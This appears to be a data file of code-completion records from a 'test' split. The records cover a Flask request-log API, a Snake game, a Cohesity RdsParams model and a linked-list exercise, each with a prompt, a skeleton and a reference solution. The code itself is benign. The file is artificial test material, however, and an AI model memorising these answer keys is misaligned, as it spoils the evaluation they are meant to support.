RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\"\"\"\n args = parser.parse_args()\n request_id = args.get('request_id')\n status_num = args.get('status_num')\n page = args.get('pgnum')\n if not page:\n page = 1\n options = {'page': page, 'request_id': request_id, 'status_num': status_num}\n if log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\n else:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data\n\n def delete(self, id=None):\n \"\"\"根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\"\"\"\n response_data['data'] = ''\n response_data['pg'] = ''\n if id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n else:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n", "source": "the_stack_v2_python_sparse", "source_path": 
"app/main/base/apis/request_logs.py", "source_repo": "zhouliang0v0/naguan-kpy", "split": "test", "star_events_count": 0} {"blob_id": "fa3d86b057c416802ed490a7c7bf1603492b99f4", "bodies": ["self.n = height\nself.m = width\nself.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\nself.food = collections.deque(food)\nself.snake_set = {(0, 0)}\nself.snake = collections.deque([(0, 0)])", "x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\nif x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\ntail = self.snake.popleft()\nself.snake_set.discard(tail)\nif (x, y) in self.snake_set:\n return -1\nif len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\nself.snake.append((x, y))\nself.snake_set.add((x, y))\nreturn len(self.snake) - 1"], "bodies_text": "<|body_start_0|>\n self.n = height\n self.m = width\n self.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\n self.food = collections.deque(food)\n self.snake_set = {(0, 0)}\n self.snake = collections.deque([(0, 0)])\n<|end_body_0|>\n\n<|body_start_1|>\n x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\n if x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\n tail = self.snake.popleft()\n self.snake_set.discard(tail)\n if (x, y) in self.snake_set:\n return -1\n if len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\n self.snake.append((x, y))\n self.snake_set.add((x, y))\n return len(self.snake) - 1\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SnakeGame", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SnakeGame:\n\n def __init__(self, width: int, height: int, food: List[List[int]]):\n \"\"\"Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\"\"\"\n <|body_0|>\n\n def move(self, direction: str) -> int:\n \"\"\"Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.n = height\n self.m = width\n self.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\n self.food = collections.deque(food)\n self.snake_set = {(0, 0)}\n self.snake = collections.deque([(0, 0)])\n<|end_body_0|>\n\n<|body_start_1|>\n x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\n if x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\n tail = self.snake.popleft()\n self.snake_set.discard(tail)\n if (x, y) in self.snake_set:\n return -1\n if len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\n self.snake.append((x, y))\n self.snake_set.add((x, y))\n return len(self.snake) - 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000123", "length_bytes": 1784, "license_type": "no_license", "methods": [{"docstring": "Initialize your data structure here. 
@param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].", "name": "__init__", "signature": "def __init__(self, width: int, height: int, food: List[List[int]])"}, {"docstring": "Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.", "name": "move", "signature": "def move(self, direction: str) -> int"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006012", "prompt": "Implement the Python class `SnakeGame` described below.\n\nClass description:\nImplement the SnakeGame class.\n\nMethod signatures and docstrings:\n- def __init__(self, width: int, height: int, food: List[List[int]]): Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\n- def move(self, direction: str) -> int: Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.", "prompted_full_text": "Implement the Python class `SnakeGame` described below.\n\nClass description:\nImplement the SnakeGame class.\n\nMethod signatures and docstrings:\n- def __init__(self, width: int, height: int, food: List[List[int]]): Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\n- def move(self, direction: str) -> int: Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.\n\n<|skeleton|>\nclass SnakeGame:\n\n def __init__(self, width: int, height: int, food: List[List[int]]):\n \"\"\"Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\"\"\"\n <|body_0|>\n\n def move(self, direction: str) -> int:\n \"\"\"Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. 
Game over when snake crosses the screen boundary or bites its body.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.n = height\n self.m = width\n self.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\n self.food = collections.deque(food)\n self.snake_set = {(0, 0)}\n self.snake = collections.deque([(0, 0)])\n<|end_body_0|>\n\n<|body_start_1|>\n x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\n if x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\n tail = self.snake.popleft()\n self.snake_set.discard(tail)\n if (x, y) in self.snake_set:\n return -1\n if len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\n self.snake.append((x, y))\n self.snake_set.add((x, y))\n return len(self.snake) - 1\n<|end_body_1|>\n", "revision_id": "59f70dc4466e15df591ba285317e4a1fe808ed60", "skeleton": "<|skeleton|>\nclass SnakeGame:\n\n def __init__(self, width: int, height: int, food: List[List[int]]):\n \"\"\"Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\"\"\"\n <|body_0|>\n\n def move(self, direction: str) -> int:\n \"\"\"Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SnakeGame:\n def __init__(self, width: int, height: int, food: List[List[int]]):\n \"\"\"Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\"\"\"\n self.n = height\n self.m = width\n self.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\n self.food = collections.deque(food)\n self.snake_set = {(0, 0)}\n self.snake = collections.deque([(0, 0)])\n\n def move(self, direction: str) -> int:\n \"\"\"Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. 
Game over when snake crosses the screen boundary or bites its body.\"\"\"\n x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\n if x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\n tail = self.snake.popleft()\n self.snake_set.discard(tail)\n if (x, y) in self.snake_set:\n return -1\n if len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\n self.snake.append((x, y))\n self.snake_set.add((x, y))\n return len(self.snake) - 1\n", "source": "the_stack_v2_python_sparse", "source_path": "leet/Design/353_Design_Snake_Game.py", "source_repo": "arsamigullin/problem_solving_python", "split": "test", "star_events_count": 0} {"blob_id": "c6b61b1ccc655e553605ee2fb68683d9add0b6f2", "bodies": ["self.availability_zone_id = availability_zone_id\nself.db_instance_id = db_instance_id\nself.db_option_group_id = db_option_group_id\nself.db_parameter_group_id = db_parameter_group_id\nself.db_port = db_port\nself.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\nself.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\nself.enable_db_authentication = enable_db_authentication\nself.enable_public_accessibility = enable_public_accessibility\nself.is_multi_az_deployment = is_multi_az_deployment", "if dictionary is None:\n return None\navailability_zone_id = dictionary.get('availabilityZoneId')\ndb_instance_id = dictionary.get('dbInstanceId')\ndb_option_group_id = dictionary.get('dbOptionGroupId')\ndb_parameter_group_id = dictionary.get('dbParameterGroupId')\ndb_port = dictionary.get('dbPort')\nenable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\nenable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\nenable_db_authentication = dictionary.get('enableDbAuthentication')\nenable_public_accessibility = dictionary.get('enablePublicAccessibility')\nis_multi_az_deployment = dictionary.get('isMultiAzDeployment')\nreturn cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)"], "bodies_text": "<|body_start_0|>\n self.availability_zone_id = availability_zone_id\n self.db_instance_id = db_instance_id\n self.db_option_group_id = db_option_group_id\n self.db_parameter_group_id = db_parameter_group_id\n self.db_port = db_port\n self.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\n self.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\n self.enable_db_authentication = enable_db_authentication\n self.enable_public_accessibility = enable_public_accessibility\n self.is_multi_az_deployment = is_multi_az_deployment\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n availability_zone_id = dictionary.get('availabilityZoneId')\n db_instance_id = dictionary.get('dbInstanceId')\n db_option_group_id = dictionary.get('dbOptionGroupId')\n db_parameter_group_id = dictionary.get('dbParameterGroupId')\n db_port = dictionary.get('dbPort')\n enable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\n enable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\n enable_db_authentication = dictionary.get('enableDbAuthentication')\n enable_public_accessibility = dictionary.get('enablePublicAccessibility')\n is_multi_az_deployment = 
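The SnakeGame record that closes above is the classic deque-plus-set design: the tail is popped before the collision check so the snake may safely chase its own tail, eating food re-appends the tail to grow the snake, and any wall or self collision returns -1. A worked trace on a 3-wide, 2-tall board, with the class and its collections/typing imports assumed in scope; each expected score follows from that move logic.

```python
game = SnakeGame(width=3, height=2, food=[[1, 2], [0, 1]])

print(game.move('R'))  # 0: head to (0, 1), no food there
print(game.move('D'))  # 0: head to (1, 1)
print(game.move('R'))  # 1: eats the food at (1, 2), tail re-appended
print(game.move('U'))  # 1: head to (0, 2)
print(game.move('L'))  # 2: eats the food at (0, 1)
print(game.move('U'))  # -1: row index goes to -1, off the board, game over
```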
dictionary.get('isMultiAzDeployment')\n return cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto", "class_name": "RdsParams", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RdsParams:\n \"\"\"Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\"\"\"\n\n def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None):\n \"\"\"Constructor for the RdsParams class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.availability_zone_id = availability_zone_id\n self.db_instance_id = db_instance_id\n self.db_option_group_id = db_option_group_id\n self.db_parameter_group_id = db_parameter_group_id\n self.db_port = db_port\n self.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\n self.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\n self.enable_db_authentication = enable_db_authentication\n self.enable_public_accessibility = enable_public_accessibility\n self.is_multi_az_deployment = is_multi_az_deployment\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n availability_zone_id = dictionary.get('availabilityZoneId')\n db_instance_id = dictionary.get('dbInstanceId')\n db_option_group_id = dictionary.get('dbOptionGroupId')\n db_parameter_group_id = dictionary.get('dbParameterGroupId')\n db_port = dictionary.get('dbPort')\n enable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\n enable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\n enable_db_authentication = dictionary.get('enableDbAuthentication')\n enable_public_accessibility = dictionary.get('enablePublicAccessibility')\n is_multi_az_deployment = dictionary.get('isMultiAzDeployment')\n return cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000124", "length_bytes": 4883, "license_type": "permissive", "methods": [{"docstring": "Constructor for the RdsParams class", "name": "__init__", "signature": "def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `RdsParams` described below.\n\nClass description:\nImplementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. 
enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\n\nMethod signatures and docstrings:\n- def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None): Constructor for the RdsParams class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `RdsParams` described below.\n\nClass description:\nImplementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\n\nMethod signatures and docstrings:\n- def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None): Constructor for the RdsParams class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass RdsParams:\n \"\"\"Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. 
enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\"\"\"\n\n def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None):\n \"\"\"Constructor for the RdsParams class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.availability_zone_id = availability_zone_id\n self.db_instance_id = db_instance_id\n self.db_option_group_id = db_option_group_id\n self.db_parameter_group_id = db_parameter_group_id\n self.db_port = db_port\n self.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\n self.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\n self.enable_db_authentication = enable_db_authentication\n self.enable_public_accessibility = enable_public_accessibility\n self.is_multi_az_deployment = is_multi_az_deployment\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n availability_zone_id = dictionary.get('availabilityZoneId')\n db_instance_id = dictionary.get('dbInstanceId')\n db_option_group_id = dictionary.get('dbOptionGroupId')\n db_parameter_group_id = dictionary.get('dbParameterGroupId')\n db_port = dictionary.get('dbPort')\n enable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\n enable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\n enable_db_authentication = dictionary.get('enableDbAuthentication')\n enable_public_accessibility = dictionary.get('enablePublicAccessibility')\n is_multi_az_deployment = dictionary.get('isMultiAzDeployment')\n return cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass RdsParams:\n \"\"\"Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. 
enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\"\"\"\n\n def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None):\n \"\"\"Constructor for the RdsParams class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RdsParams:\n \"\"\"Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\"\"\"\n\n def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None):\n \"\"\"Constructor for the RdsParams class\"\"\"\n self.availability_zone_id = availability_zone_id\n self.db_instance_id = db_instance_id\n self.db_option_group_id = db_option_group_id\n self.db_parameter_group_id = db_parameter_group_id\n self.db_port = db_port\n self.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\n self.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\n self.enable_db_authentication = enable_db_authentication\n self.enable_public_accessibility = enable_public_accessibility\n self.is_multi_az_deployment = is_multi_az_deployment\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n availability_zone_id = dictionary.get('availabilityZoneId')\n db_instance_id = dictionary.get('dbInstanceId')\n db_option_group_id = dictionary.get('dbOptionGroupId')\n db_parameter_group_id = dictionary.get('dbParameterGroupId')\n db_port = dictionary.get('dbPort')\n enable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\n enable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\n enable_db_authentication = dictionary.get('enableDbAuthentication')\n enable_public_accessibility = dictionary.get('enablePublicAccessibility')\n is_multi_az_deployment = dictionary.get('isMultiAzDeployment')\n return cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/rds_params.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "12db096aedf15b066c5ec0ae75a80ee760694486", "bodies": ["dummy = ListNode(0)\ndummy.next = head\ncurr = head\nposition = 0\nwhile curr:\n position += 1\n curr = curr.next\nposition -= n\ncurr = dummy\nwhile position > 0:\n position -= 1\n curr = curr.next\ncurr.next = curr.next.next\nreturn dummy.next", "dummy = ListNode(0)\ndummy.next = head\nfirst = dummy\nsecond = dummy\nfor i in range(n + 1):\n first = first.next\nwhile first:\n first = first.next\n second = second.next\nsecond.next = second.next.next\nreturn dummy.next"], "bodies_text": "<|body_start_0|>\n dummy = ListNode(0)\n dummy.next = head\n curr = head\n position = 0\n while curr:\n position += 1\n curr = curr.next\n position -= n\n curr = dummy\n while position > 0:\n position -= 1\n curr = curr.next\n curr.next = curr.next.next\n return dummy.next\n<|end_body_0|>\n\n<|body_start_1|>\n dummy = ListNode(0)\n dummy.next = head\n first = dummy\n second = dummy\n for i in range(n + 1):\n first = first.next\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"Two pass solution\"\"\"\n <|body_0|>\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"One pass solution, maintaining an (n + 1) gap b/w two pointers\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n dummy = ListNode(0)\n dummy.next = head\n curr = head\n position = 0\n while curr:\n position += 1\n curr = curr.next\n position -= n\n curr = dummy\n while position > 0:\n position -= 1\n curr = curr.next\n curr.next = curr.next.next\n return dummy.next\n<|end_body_0|>\n\n<|body_start_1|>\n dummy = ListNode(0)\n dummy.next = head\n first = dummy\n second = dummy\n for i in range(n + 1):\n first = first.next\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000125", "length_bytes": 1243, "license_type": "no_license", "methods": [{"docstring": "Two pass solution", "name": "removeNthFromEnd", "signature": "def 
removeNthFromEnd(self, head: ListNode, n: int) -> ListNode"}, {"docstring": "One pass solution, maintaining an (n + 1) gap b/w two pointers", "name": "removeNthFromEnd", "signature": "def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002255", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: Two pass solution\n- def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: One pass solution, maintaining an (n + 1) gap b/w two pointers", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: Two pass solution\n- def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: One pass solution, maintaining an (n + 1) gap b/w two pointers\n\n<|skeleton|>\nclass Solution:\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"Two pass solution\"\"\"\n <|body_0|>\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"One pass solution, maintaining an (n + 1) gap b/w two pointers\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n dummy = ListNode(0)\n dummy.next = head\n curr = head\n position = 0\n while curr:\n position += 1\n curr = curr.next\n position -= n\n curr = dummy\n while position > 0:\n position -= 1\n curr = curr.next\n curr.next = curr.next.next\n return dummy.next\n<|end_body_0|>\n\n<|body_start_1|>\n dummy = ListNode(0)\n dummy.next = head\n first = dummy\n second = dummy\n for i in range(n + 1):\n first = first.next\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n<|end_body_1|>\n", "revision_id": "f33d004d7629d46fbc5670f5b384f8a604d7f1e7", "skeleton": "<|skeleton|>\nclass Solution:\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"Two pass 